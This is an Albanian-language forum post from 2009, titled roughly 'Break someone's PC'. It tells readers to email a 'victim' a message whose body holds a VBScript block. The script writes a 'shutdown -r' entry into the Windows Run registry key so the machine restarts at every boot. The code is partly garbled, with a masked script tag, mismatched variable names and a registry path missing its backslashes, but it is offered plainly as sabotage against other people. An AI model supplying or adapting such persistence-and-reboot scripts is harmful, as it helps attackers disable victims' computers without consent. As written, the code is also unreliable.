shqiprim13@live.com
 
ForumCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Prish pc dikujna

Shko poshtë 
AutoriMesazh
Admin
Admin


Numri i postimeve : 48
Join date : 14/06/2009
Age : 22
Location : add ime u shqiprim13@kosovalle.de

MesazhTitulli: Prish pc dikujna   Mon Jun 15, 2009 3:01 pm

Code te cilat e shkymin kompjuterin edhe code te tjera

Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!

Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:

--------------------------------------------------------------------------

******** ****************="vbscript"> on error resume next dim ok

set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunSYSTEM32","shutdown -r"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunSYSTEM32","shutdown -r"

</SCRIPT>

--------------------------------------------------------------------------

Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe pakme nalt, do ti shkymet kompjuteri! dhe cdoher kur te Starton kopmjuterin!

per 24 sekonda do ti shymet
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://rimi-hack2.albanianforum.net
 
Prish pc dikujna
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Graboci forum :: Your first category :: Gjithqka kliko ketu-
Kërce tek: